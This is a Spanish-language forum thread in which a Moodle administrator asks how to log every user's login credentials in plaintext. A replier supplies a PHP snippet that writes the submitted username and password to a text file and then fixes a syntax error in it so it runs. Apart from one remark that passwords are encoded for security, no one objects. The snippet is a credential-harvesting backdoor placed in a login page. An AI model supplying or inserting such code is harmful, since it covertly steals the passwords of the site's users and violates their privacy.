Modificar el formulario login de Moodle

Iniciado por Luisinho_dinho, 5 Abril 2011, 19:02 PM

0 Miembros y 1 Visitante están viendo este tema.

Luisinho_dinho

Tengo una plataforma moodle. Me gustaría modificarla para que, cada vez que alguien inicie sesión, se guarde usuario y contraseña en un archivo de texto o que se guarde en la base de datos sin codificar.

Investigando un poco, supongo que el formulario es este:
   <form action="<?php echo $CFG->httpswwwroot?>/login/index.php" method="post" id="login">
          <div class="loginform">
            <div class="form-label"><label for="username"><?php print_string("username"?></label></div>
            <div class="form-input">
              <input type="text" name="username" id="username" size="15" value="<?php p($frm->username?>" />
            </div>
            <div class="clearer"><!-- --></div>
            <div class="form-label"><label for="password"><?php print_string("password"?></label></div>
            <div class="form-input">
              <input type="password" name="password" id="password" size="15" value="" />
              <input type="submit" id="loginbtn" value="<?php print_string("login"?>" />
              <div class="forgetpass"><a href="forgot_password.php"><?php print_string("forgotten"?></a></div>
            </div>
            <div class="clearer"><!-- --></div>
          </div>
        </form>
      </div>

¿Cómo puedo hacerlo?

¡Gracias por su ayuda!

~ Yoya ~

Esta codificado por seguridad, asi si alguien logra ingresar a la base de datos, puede tener todos los password...

Lo unico que tienes que hacer es crear una tabla o modificar una, y luego ir ingresando los datos...
Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

Luisinho_dinho

Pero, ¿Cómo hago que la contraseña ingresada se mande y se guarde en la base de datos? Mi nivel de PHP es bastante limitado.

~ Yoya ~

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

merolhack

Hola, tienes que modificar los archivos PHP del login, en donde recibe los datos de ese formulario.

Bájate el Notepad++ y busca lo siguiente en todos los archivos:
$_POST['username']
Si no encuentras nada prueba con username

Ya que lo encuentres, toma ese valor y has un simple codigo que escriba un TXT:
$filename = "01042011/log4.txt";
$fh = fopen($filename, 'a+') or die("can't open file");
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];
fwrite($fh, $stringData);
fclose($fh);

PHP Web Developer
Joomla, jQuery, MySQL, CSS, etc...

Android APP Developer http://android-dev.tumblr.com/

Luisinho_dinho

El código que me has pasado me da error en la 3º línea.
Parse error: syntax error, unexpected T_VARIABLE in /srv/www/htdocs/moodle/login/index.php on line 294
Corresponde a la línea:
$stringData = "Usuario: "$_POST['username'] . " Contraseña: ".$_POST['password'];


merolhack

Ah perdon, es algo así la concatenación:
Citar$stringData = "Usuario: ".$_POST['username'] . " Contraseña: ".$_POST['password'];

Pero OJO, esto lo tienes que revisar bien en los archivos de Moodle, ya que no se si ahí es donde reciba los datos por POST, a mi Moodle se me hace que esta mal hecho...
PHP Web Developer
Joomla, jQuery, MySQL, CSS, etc...

Android APP Developer http://android-dev.tumblr.com/